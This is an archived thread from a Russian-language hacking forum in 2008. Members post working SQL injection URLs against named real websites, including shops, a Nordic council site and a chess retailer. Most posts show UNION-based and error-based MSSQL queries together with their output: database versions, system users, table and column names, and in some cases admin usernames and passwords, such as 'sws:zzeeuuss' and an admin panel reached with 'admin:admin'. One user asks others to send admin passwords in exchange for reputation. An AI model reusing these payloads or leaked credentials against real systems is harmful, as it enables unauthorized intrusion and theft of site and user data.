ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #5411  
Старый 05.05.2008, 08:00
Ponchik
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219

Репутация: 2274


По умолчанию

magic-shop.ru
первый магазин фокусов и иллюзии
1 фокус показываю я Ж)
http://www.magic-shop.ru/?action=product_view&id=-1'+UNION+SELECT+1,2,concat_ws(0x3a,VERSION(),USER( ),DATABASE()),4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37,38,39,40,41,42/*
4.1.20-1.gms:w_magics@195.42.160.22:w_magics
Ничё подобрать не получилось но лучше так чем никак, мб там префикс т.к. новости на сайте есть а таблы news нету, ну мб она называется nowosty Ж)
 
Ответить с цитированием

  #5412  
Старый 05.05.2008, 15:04
SWAT
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
Провел на форуме:
1541753

Репутация: 552
По умолчанию

Код:
http://www.handshake.in/browse.videos.php?category=-1+union+all+select+1,2,3,concat(admin_username,char(58),admin_password),5,6,7,8+from+joovili_admins/*
и админка
http://www.handshake.in/admin/login.php
admin:admin

Код:
http://www.hostreward.com/directory.php?ax=list&sub=7&cat_id=-1+union+all+select+1,2,concat(id,0x3a,name,0x3a,email,0x3a,password),4,null,null,7,8,9,10,11,12,13,14+from+links--

Последний раз редактировалось SWAT; 05.05.2008 в 15:13..
 
Ответить с цитированием

  #5413  
Старый 05.05.2008, 17:38
CaNNabi$
Познающий
Регистрация: 21.01.2008
Сообщений: 85
Провел на форуме:
839509

Репутация: 338
Отправить сообщение для CaNNabi$ с помощью ICQ
По умолчанию

www.mt8.ru
Код:
http://www.mt8.ru/index.php?action=product_view&id=0x3127%20union+select+1,2,concat_ws(0x3a,VERSION(),USER(),DATABASE()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39/*
4.0.25-log:medtehni@dux.hc.ru:wwwmedtehnika8ru


www.bestwine.ru
Код:
http://www.bestwine.ru/index.php?action=product_view&id=0x36383327%20union+select+1,2,concat_ws(0x3a,VERSION(),USER(),DATABASE()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38/*
5.0.45-log:u93285@10.10.153.168:u93285


www.alcotrade.ru
Код:
http://www.alcotrade.ru/index.php?action=product_view&id=0x342733383638%20union+select+1,2,concat_ws(0x3a,VERSION(),USER(),DATABASE()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38/*
4.1.22-standard-log:interdes_alcotra@localhost:interdes_alcotrade
 
Ответить с цитированием

  #5414  
Старый 05.05.2008, 19:32
maxster
Участник форума
Регистрация: 27.10.2006
Сообщений: 205
Провел на форуме:
2298631

Репутация: 380
Отправить сообщение для maxster с помощью ICQ
По умолчанию

www.autovista.ru
Код:
http://www.autovista.ru/spy/publish.php?id=-111+UNION+SELECT+email,password,3,4+from+shop/*
 
Ответить с цитированием

  #5415  
Старый 05.05.2008, 19:36
truelamer
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
Провел на форуме:
350782

Репутация: 81
По умолчанию

http://www.norden.org/webb/calendar/showevent.asp?id=2992)+and+1=(select+@@version)--

Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4



system_user:nmr

http://www.norden.org/webb/calendar/showevent.asp?id=2992)+and+1=(select+top+1+table_n ame+from+information_schema.tables+where+table_nam e+not+in('UpperMenu4','delete_sektor_issues2','AN_ Issues','sektor_issues','Calendar','Accreditation' ,%20'Accreditation_events',%20'Accreditation_showd ata',%20'Accreditation2',%20'AN_Authors',%20'AN_El ements',%20'Banner',%20'BLOG_ANSWERS','BLOG_COMMEN TS',%20'BLOG_POLLS','BLOG_RESULTS','BLOG_SETTINGS' ,%20'BLOG_USERS','BLOG_WEBLOG','Calendar_Informati on'))--

нашли табличку BLOG_USERS, копаем её......


http://www.norden.org/webb/calendar/showevent.asp?id=2992)+and+1=(select+top+1+column_ name+from+information_schema.columns+where+table_n ame='BLOG_USERS'+and+column_name+not+in('id','uFUL LNAME','uUSERNAME','uPASSWORD','uEMAIL','uDATECREA TED'))--


http://www.norden.org/webb/calendar/showevent.asp?id=2992)+and+1=(select+top+1+cast(uU SERNAME+as+nvarchar)%2B%27%3A%27%2Bcast(uPASSWORD+ as+nvarchar)+from+BLOG_USERS)--

целый один пользователь)))):

login:sws
pass:zzeeuuss

Последний раз редактировалось truelamer; 05.05.2008 в 19:43..
 
Ответить с цитированием

  #5416  
Старый 05.05.2008, 23:07
samarin
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
Провел на форуме:
295283

Репутация: 69
Отправить сообщение для samarin с помощью ICQ
По умолчанию

www.intone.ru - полифония,реалтоны и т.д на мобильники

Код:
http://www.intone.ru/get2.php?partner=269&id=-1/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29/*
Цитата:
5.0.26-log
jgamesru_int@localhost
jgamesru_int
 
Ответить с цитированием

  #5417  
Старый 05.05.2008, 23:19
KPOT_f!nd
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
Провел на форуме:
3405508

Репутация: 1745


По умолчанию

Код:
http://www.chessbase.com/shop/product.asp?pid=1%20or%201=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='cbuser'+AND+COLUMN_NAME+NOT+IN+('newsid','ID','Name','PW'))--
 
Ответить с цитированием

  #5418  
Старый 06.05.2008, 00:10
SWAT
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
Провел на форуме:
1541753

Репутация: 552
По умолчанию

Код:
http://www.fifacz.com/index.php?news_id=-9999+union+all+select+1,2,concat(user_name,char(58),user_password),null,5,6,7,null,9,10,11,12,13+from+users--
Код:
http://www.velosaddles.com/products.php?cat_id=-1+union+all+select+1,2,null,4,5,concat(username,char(58),password),7+from+logins/*
Код:
http://giftman.ru/news_view.php?news_id=-9999+union+select+null,null,null,concat_ws(0x2A,login,pwd_hash,email),null,null,null+FROM+u15364.ra_users/*

Последний раз редактировалось SWAT; 06.05.2008 в 00:18..
 
Ответить с цитированием

  #5419  
Старый 06.05.2008, 14:44
MaSter GeN
Познающий
Регистрация: 26.01.2008
Сообщений: 71
Провел на форуме:
280720

Репутация: 141
Отправить сообщение для MaSter GeN с помощью ICQ
По умолчанию

Код:
1.http://www.sanza.co.uk/apps/shop/shop.asp?sc_Id=522 or 1=@@version--
1.Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 
2.http://www.sanza.co.uk/apps/shop/shop.asp?sc_Id=522 or 1=(select db_name())-- 
2.'sanza'
3.http://www.sanza.co.uk/apps/shop/shop.asp?sc_Id=522 or 1=(select system_user)-- 
3. 'SYNERGY1\IUSR_SYNERGY1'
 
Ответить с цитированием

  #5420  
Старый 06.05.2008, 15:47
-=megahertz=-
Участник форума
Регистрация: 23.05.2007
Сообщений: 103
Провел на форуме:
380957

Репутация: 56
Отправить сообщение для -=megahertz=- с помощью ICQ
По умолчанию

http://www.reasonmusic.ru/modules/articles/article.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20/*
кому не сложно киньте админ пароли в ЛС за +++++
версия БД 5.0.26
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 6 (пользователей: 0 , гостей: 6)
 


Быстрый переход




ANTICHAT.XYZ